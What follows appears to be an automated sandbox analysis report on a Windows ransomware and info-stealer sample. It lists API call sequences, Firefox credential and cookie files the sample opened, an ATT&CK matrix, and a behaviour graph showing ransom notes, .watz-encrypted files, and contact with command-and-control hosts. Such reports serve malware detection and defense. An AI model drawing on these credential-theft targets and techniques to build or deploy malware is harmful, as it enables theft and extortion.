          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: GetNumberFormatA,SetVolumeMountPointA,GetNumberFormatW,CreateJobObjectW,GetConsoleAliasExesW,EnumDateFormatsA,CreateNamedPipeA,GetProcessVersion,SetFileShortNameA,SetProcessShutdownParameters,GetCalendarInfoA,LoadLibraryW,GetModuleFileNameW,GetNumberFormatA,GetLogicalDriveStringsA,VerifyVersionInfoW,SetVolumeMountPointA,CreateHardLinkA,UnlockFile,SetCommState,GetTempPathA,_memset,CommConfigDialogW,CreateActCtxA,EnumCalendarInfoExA,GetLocaleInfoA,ReadConsoleInputW,SetVolumeMountPointA,GetConsoleAliasExesLengthW,CreateEventW,5_2_004035E0
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,5_2_02420AB6
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,5_2_0240C8B7
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,5_2_0241394D
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,5_2_024149EA
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,5_2_02413F87
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,6_2_023D0AB6
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,6_2_023BC8B7
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,6_2_023C394D
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,6_2_023C49EA
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,6_2_023C3F87
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,12_2_0043404A
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,12_2_00438178
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,12_2_00440116
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_004382A2
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: GetLocaleInfoW,_GetPrimaryLen,12_2_0043834F
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,12_2_00438423
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,12_2_004335E7
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: EnumSystemLocalesW,12_2_004387C8
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: GetLocaleInfoW,12_2_0043884E
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,12_2_00432B6D
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,12_2_00437BB3
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: EnumSystemLocalesW,12_2_00437E27
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,12_2_00437E83
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,12_2_00437F00
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,12_2_0042BF17
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,12_2_00437F83
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,12_2_00432FAD
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_00403626 GetNumberFormatW,CreateJobObjectW,GetConsoleAliasExesW,EnumDateFormatsA,CreateNamedPipeA,GetProcessVersion,SetFileShortNameA,SetProcessShutdownParameters,GetCalendarInfoA,LoadLibraryW,GetModuleFileNameW,GetNumberFormatA,GetLogicalDriveStringsA,VerifyVersionInfoW,SetVolumeMountPointA,CreateHardLinkA,UnlockFile,SetCommState,GetTempPathA,_memset,CommConfigDialogW,CreateActCtxA,EnumCalendarInfoExA,GetLocaleInfoA,ReadConsoleInputW,SetVolumeMountPointA,GetConsoleAliasExesLengthW,CreateEventW,0_2_00403626
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_0040790C GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_0040790C
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 2_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,2_2_00419F90
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 2_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,2_2_0042FE47
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 2_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,2_2_00419F90
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\ExperimentStoreData.jsonJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqliteJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\shield-preference-experiments.jsonJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage.sqliteJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\SiteSecurityServiceState.txtJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.dbJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shmJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\protections.sqliteJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\targeting.snapshot.jsonJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\containers.jsonJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqlite-walJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\times.jsonJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shmJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\AlternateServices.txtJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.jsJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\parent.lockJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore.jsonlz4Jump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\handlers.jsonJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-walJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-walJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionCheckpoints.jsonJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\webappsstore.sqlite-walJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\addonStartup.json.lz4Jump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\xulstore.jsonJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\permissions.sqliteJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\pkcs11.txtJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\webappsstore.sqliteJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\y572q81e.default\times.jsonJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\extension-preferences.jsonJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\search.json.mozlz4Jump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\addons.jsonJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqlite-shmJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\webappsstore.sqlite-shmJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\content-prefs.sqliteJump to behavior
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Native API
          1
          DLL Side-Loading
          1
          Exploitation for Privilege Escalation
          1
          Deobfuscate/Decode Files or Information
          1
          OS Credential Dumping
          2
          System Time Discovery
          1
          Taint Shared Content
          11
          Archive Collected Data
          2
          Ingress Tool Transfer
          Exfiltration Over Other Network Medium2
          Data Encrypted for Impact
          CredentialsDomainsDefault Accounts3
          Command and Scripting Interpreter
          1
          Registry Run Keys / Startup Folder
          1
          DLL Side-Loading
          3
          Obfuscated Files or Information
          LSASS Memory1
          Account Discovery
          Remote Desktop Protocol1
          Data from Local System
          21
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAt1
          Services File Permissions Weakness
          212
          Process Injection
          22
          Software Packing
          Security Account Manager3
          File and Directory Discovery
          SMB/Windows Admin Shares1
          Screen Capture
          2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
          Registry Run Keys / Startup Folder
          1
          DLL Side-Loading
          NTDS25
          System Information Discovery
          Distributed Component Object ModelInput Capture13
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
          Services File Permissions Weakness
          1
          Masquerading
          LSA Secrets1
          Query Registry
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
          Virtualization/Sandbox Evasion
          Cached Domain Credentials151
          Security Software Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items212
          Process Injection
          DCSync21
          Virtualization/Sandbox Evasion
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Services File Permissions Weakness
          Proc Filesystem2
          Process Discovery
          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
          System Owner/User Discovery
          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
          System Network Configuration Discovery
          Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1503035 Sample: 66d5df681876c_file010924.exe Startdate: 02/09/2024 Architecture: WINDOWS Score: 100 61 cajgtus.com 2->61 63 api.2ip.ua 2->63 71 Suricata IDS alerts for network traffic 2->71 73 Found malware configuration 2->73 75 Malicious sample detected (through community Yara rule) 2->75 77 8 other signatures 2->77 9 66d5df681876c_file010924.exe 2->9         started        12 66d5df681876c_file010924.exe 2->12         started        14 66d5df681876c_file010924.exe 2->14         started        16 3 other processes 2->16 signatures3 process4 signatures5 87 Detected unpacking (changes PE section rights) 9->87 89 Detected unpacking (overwrites its own PE header) 9->89 91 Writes a notice file (html or txt) to demand a ransom 9->91 99 2 other signatures 9->99 18 66d5df681876c_file010924.exe 1 17 9->18         started        93 Multi AV Scanner detection for dropped file 12->93 95 Machine Learning detection for dropped file 12->95 97 Injects a PE file into a foreign processes 12->97 22 66d5df681876c_file010924.exe 16 12->22         started        25 66d5df681876c_file010924.exe 14->25         started        27 66d5df681876c_file010924.exe 16->27         started        29 66d5df681876c_file010924.exe 16->29         started        31 66d5df681876c_file010924.exe 16->31         started        process6 dnsIp7 65 api.2ip.ua 188.114.97.3, 443, 49701, 49702 CLOUDFLARENETUS European Union 18->65 43 C:\Users\...\66d5df681876c_file010924.exe, PE32 18->43 dropped 45 66d5df681876c_file...exe:Zone.Identifier, ASCII 18->45 dropped 33 66d5df681876c_file010924.exe 18->33         started        36 icacls.exe 18->36         started        47 C:\Users\user\_readme.txt, ASCII 22->47 dropped 49 C:\Users\user\Desktop\LFOPODGVOH.mp3, data 22->49 dropped 51 C:\Users\user\AppData\Local\...\_readme.txt, ASCII 22->51 dropped 79 Modifies existing user documents (likely ransomware behavior) 22->79 file8 signatures9 process10 signatures11 69 Injects a PE file into a foreign processes 33->69 38 66d5df681876c_file010924.exe 1 21 33->38         started        process12 dnsIp13 67 cajgtus.com 190.220.21.28, 49705, 49706, 80 AMXArgentinaSAAR Argentina 38->67 53 C:\_readme.txt, ASCII 38->53 dropped 55 10f5ef49-b826-4bae...85f.tmp.watz (copy), Google 38->55 dropped 57 C:\Users\user\...\acroNGLLog.txt.watz (copy), data 38->57 dropped 59 96 other malicious files 38->59 dropped 81 Tries to harvest and steal browser information (history, passwords, etc) 38->81 83 Infects executable files (exe, dll, sys, html) 38->83 85 Modifies existing user documents (likely ransomware behavior) 38->85 file14 signatures15

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
